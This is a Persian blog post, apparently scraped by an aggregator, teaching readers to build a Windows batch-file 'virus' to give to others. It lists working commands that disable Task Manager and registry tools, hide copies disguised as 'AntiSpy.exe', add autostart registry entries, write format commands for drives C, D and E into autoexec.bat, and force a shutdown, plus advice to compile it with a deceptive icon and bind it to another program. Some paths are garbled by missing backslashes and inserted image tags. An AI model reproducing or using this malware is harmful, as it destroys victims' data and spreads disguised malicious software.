ویروس بالا نیومدن ویندوز

سلام دوستان این ویروس رو وقتی ب کسی بدید دیه ویندوزش بالا نمیاد ////////برید ادامه مطالب//////

آموزش ساخت یک ویروس توپ فقط با ویندوز


خوب در اول ما باید یک فایل متنی ایجاد کنیم که از برنامه نت پد می شود استفاده کرد . سپس
بعد نوشتن فرمان های مورد نظر فایل مذکور را با پسوند bat ذخیره می کنیم . در ادامه کار
بوسیله برنامه Quick Batch File Compiler فایل مورد نظر را تبدیل به فایل اجرایی با پسوند exe
می کنیم و یک آیسلامد هم برای فایل مشخص می کنیم تا ظاهری گول زننده داشته باشد.
در نهایت هم این فایل می توانیم بوسیله برنامه EBundle به یک برنامه پیوست کنیم که در زمان
اجرای برنامه مورد نظر کاربر فایل ما هم اجرا شده .

فرمان ها :

1- با استفاده از دو فرمان زیر دو سرویس TaskManager و Registry بصورت غیر قابل استفاده برای کاربر خواهد شد.

غیر فعال کردن TaskManager


reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f

غیر فعال کردن Registry


reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f

البته با تغییر مقدار از 1 به 0 کاربر می تواند از این دو سرویس استفاده کند.بعنوان مثال سیستم
شما آلوده به ویروس شده و شما نمی توانید از این دو سرویس استفاده نمایید فقط کافی است
یک فایل اجرا ساخته و این دو فرمان را در داخل آن قرار داده البته مقدار هر دو را برابر 0 قرار دهید
بعد از اجرای فایل شما می توانید از این دو سرویس استفاده کنید.

2- در این قسمت تمام فایل های اجرای با پسوند exe از دایرکتوری جاری به درایو مورد نظر
کپی می شود و در ادامه خصلیت فایل مورد نظر بصورت مخفی و فقط خواندنی تعریف می شود


copy *.exe e:
copy *.exe d:
d:
attrib +r +h AntiSpy.exe
e:
attrib +r +h AntiSpy.exe

3- در این قسمت هم آدرس فایل مورد نظر در رجیستری در قسمت Run تعریف می شود که در هر بار اجرا شدن ویندوز فایل مورد نظر اجرا شود . البته در اینجا من فقط آدرس فایل را از پارتیشن C
تعریف کردم شما می توانید این کار را برای دیگر پارتیشن ها هم انجام دهید.


reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRun /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f
reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRunOnce /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f
reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRunServices /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f
reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRunServicesOnce /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f
reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionRun /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f
reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionRunOnce /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f

4- در این مرحله باز فایل اجرای مورد نظر را از دایرکتوری جاری به داخل دایرکتوری startup ویندوز
کپی می شود که باز با اجرا شدن ویندوز فایل مورد نظر ما اجرا شود.در اینجا فقط یه نکته لازم
به ذکر است که باسد توجه نمایید به نحوه آدرس دادن به مسیر کپی شدن فایل.
همونطور که میدانید در محیط داس نمی توان برای اسم یک فایل یا دایرکتوری بیش از 8 کارکتر
در نظر گرفت . در صورتیکه اسم یک فایل یا دایرکتوری بیش از 8 کارکتر باشد در محیط داس
شما نمی توانید اسم فایل یا دایرکتوری را بصورت کامل ببینید. اما اگر از فرمان cmd استفاده
نماید برای دسترسی به محیط داس شما اسم فایل و دایرکتوری را بصورت کامل می بینید
حتی اگر بیش از 8 کارکتر باشد. برای اینکه شما آدرس درست یک دایرکتوری را بدست آورید
نیاز دارید که از فرمان command استفاده نمایید.


copy *.exe c:docume~1alluse~1startm~1programsstartup
copy *.exe d:docume~1alluse~1startm~1programsstartup
copy *.exe e:docume~1alluse~1startm~1programsstartup

5- در این قسمت با تغییر در فایل autoexec.bat و با استفاده از فرمان فرمت بعد از ریستارت سیستم و با اجرا شدن این فایل پارتیشن هایی که مشخص شده اند فرمت شده و اطلاعات کاربر
پاک می شود. البته این به شرطی است که نوع فرمت پارتیشن ها بصورت FAT یا FAT32 باشد
در صورتیکه NTFS باشد فکر کنم این فایل اجرا نشود.


@echo off
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo format/v:1 /q /y d[IMG]http://*******************com/images/smilies/icon_tw isted.gif[/IMG] nul >>c:autoexec.bat
echo format/v:1 /q /y e[IMG]http://*******************com/images/smilies/icon_tw isted.gif[/IMG] nul >>c:autoexec.bat
echo format/v:1 /q /y c[IMG]http://*******************com/images/smilies/icon_tw isted.gif[/IMG] nul >>c:autoexec.bat
call attrib +r +h c:autoexec.bat >nul
6- در نهایت هم با استفاده از این فرمان بعد از مدت زمان تعیین شده سیستم ریستارت می شود
و پیغام مورد نظر شما در طول این مدت برای کاربر نشان داده می شود.

shutdown -s -t 30 -c "Ha Ha Ha"

هر چه زمان تعریف شده کمتر باشد سیستم زودتر ریستارت شده و اجازه هر کاری از کاربر سلب
سلب می شود . اگر بصورت اشتباه این فرمان را روی سیستم خود اجرا کردید با استفاده از فرمان
shutdown -a
از عمل ریستارت شدن سیستم خود می توانید جلوگیری کنید.


ویروس بالا نیومدن ویندوز

مرورگر هک

فایل ,reg ,c ,exe ,d ,استفاده ,مورد نظر ,می شود ,add hkey ,reg add ,antispy exe ,hkey current usersoftwaremicrosoftwindowscurre ,hkey local machinesoftwaremicrosoftwindowscurr ,*******************com images smilies ,http *******************com images

مشخصات

آخرین مطالب این وبلاگ

آخرین ارسال ها

آخرین وبلاگ ها

آخرین جستجو ها

مفید وردپرس Cheap Jerseys on Sale in Cheap NFL Jerseys Outlet store online طلاياب negarintorange سعدی iphone8 bluresnaghsh برنامه نویسی وب نرم افزار فیتنس جواد

درباره این سایت

  • این وبسایت تابع قوانین جمهوری مقدس اسلامی ایران بوده و در ستاد ساماندهی پایگاه های اینترنتی ثبت شده است.
  • تمامی محتوای موجود تماما خودکار از وبلاگ های فارسی دریافت میشود ؛ در صورت مشاهده هرگونه محتوای خلاف قوانین جمهوری اسلامی ایران ؛ گزارش دهید تا به قید فوریت حذف گردد.
  با افتخار قدرت گرفته از سیستم جامع بلاگ ریدر نسخه 8
©   تمامی حقوق مادی و معنوی این سایت متعلق به اسمارت نرم افزار بوده و محفوظ میباشد ، با هرگونه کپی بردای از طرح یا پوسته برخورد خواهد شد.